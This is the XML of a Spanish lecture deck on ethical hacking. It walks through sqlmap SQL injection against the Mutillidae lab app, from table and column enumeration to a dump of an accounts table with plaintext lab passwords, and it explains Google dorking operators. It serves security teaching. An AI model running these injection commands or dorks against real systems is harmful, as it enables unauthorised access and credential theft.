                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES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nowasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-E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				-&gt; Las que nos interesa.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="28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[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>performance_schema</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="28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[*]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sys</a:t>
            </a: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…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="28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39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3909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8670"/>
            <a:ext cx="11083633" cy="272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Una vez que tenemos la base de datos que nos interesa, vamos a traer las tablas.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./sqlmap.py –u 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“http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://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192.168.1.228/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mutillidae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/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index.php?page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user-info.php&amp;username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x&amp;password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x&amp;user-info-php-submit-button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View+Account+Details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” --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tables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–D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nowasp</a:t>
            </a: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0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De esta forma nos devuelve las bases de datos que contiene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MySQL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Database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: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nowasp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[13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tables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+-----------------------------------+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accounts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balloon_tips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blogs_table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captured_data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credit_cards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help_texts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hitlog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level_1_help_include_files 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page_help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	    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page_hints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pen_test_tools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user_poll_results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youTubeVideos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+------------------------------------+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8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Ahora podemos traer las columnas de una tabla determinada.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./sqlmap.py –u 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“http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://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192.168.1.228/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mutillidae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/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index.php?page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user-info.php&amp;username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x&amp;password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x&amp;user-info-php-submit-button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View+Account+Details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” --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columns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 –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D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nowasp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 –T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a: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2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De esta forma nos devuelve las columnas.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Database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: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nowasp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Table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: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accounts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[7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columns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+------------------+--------------+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Column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Type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+------------------+--------------+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cid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int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(11)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firstname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text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is_admin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varchar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(5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)|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lastname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text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mysignature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text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password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text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username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text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+------------------+--------------+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1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Por ultimo vamos a realizar un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dump</a:t>
            </a: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 de los datos.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./sqlmap.py –u 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“http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://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192.168.1.228/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mutillidae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/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index.php?page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user-info.php&amp;username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x&amp;password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x&amp;user-info-php-submit-button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=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View+Account+Details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” --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dump</a:t>
            </a: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 –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D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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nowasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a: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2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" y="27940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 Inyección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" y="1297584"/>
            <a:ext cx="12192002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" y="1278342"/>
            <a:ext cx="121919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De esta forma nos devuelve las columnas.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Database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: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nowasp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Table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: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accounts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[23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entries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+-----+---------------+------------------+-------------+---------------------+--------------+------------------------------------+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cid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username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lastname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is_admin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password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firstname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mysignature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+-----+---------------+------------------+-------------+---------------------+--------------+------------------------------------+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1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admin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Administrator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| TRUE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adminpass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System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g0t r00t?                               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2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adrian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Crenshaw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TRUE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somepassword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Adrian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Zombie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Films Rock!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3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john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Pentest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FALSE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monkey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John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I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like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the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smell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of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confunk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4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jeremy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Druin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FALSE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password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Jeremy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d1373 1337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speak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5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bryce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Galbraith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FALSE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password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Bryce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I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Love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SANS        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|</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="1600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6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samurai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WTF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FALSE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samurai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Samurai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Carving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fools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7  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jim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Rome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|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FALSE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password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Jim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 Rome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is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ES" altLang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>burning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                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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31768" y="2587461"/>
            <a:ext cx="4254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GRACIAS !!!!!!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8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3909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07" y="2043722"/>
            <a:ext cx="10663138" cy="34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3909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15" y="1295398"/>
            <a:ext cx="7690569" cy="49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97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1329136"/>
            <a:ext cx="112491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Buscar dentro de la URL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl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 -&gt; con el operador ‘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inurl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’ podremos limitar los resultados en las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url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 que contengan cierto texto.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Ej.: default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password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inurl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:’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login.php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Buscar por tipo de archivo (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filetype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 -&gt; nos permite realizar búsquedas por tipo de archivo (no solo indexa contenido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html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sino que también indexa los archivos descargables, como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pdf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doc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xls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).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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NOTA: El operador “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ext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” cumple la misma función que “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filetype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Ej.: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filetype:pdf</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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EJ.: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ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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 hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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ext:pdf</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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2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1072651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6427276"/>
            <a:ext cx="12192000" cy="82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99" y="301721"/>
            <a:ext cx="4557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Hacking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" y="1295400"/>
            <a:ext cx="11328400" cy="4936067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1778274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Búsqueda por título (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:) -&gt; busca en el título de una página web.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:aerolíneas</a:t>
            </a:r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Búsqueda de enlaces (link:) -&gt; nos permite buscar sitios que tengan el enlace al sitio que nosotros especifiquemos.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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ej.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>link:aerolineas.com.ar</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTA: No se puede utilizar el operador link con otros operadores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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32413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UTNFra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3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– Arquitectura y Sistemas Operativos</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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2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2348</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizado</PresentationFormat>
  <Paragraphs>446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5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Pablo</dc:creator>
  <cp:lastModifiedBy>Russo, Marcos Pablo</cp:lastModifiedBy>
  <cp:revision>113</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-26T02:46:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-08T18:30:13Z</dcterms:modified>
</cp:coreProperties>
</file>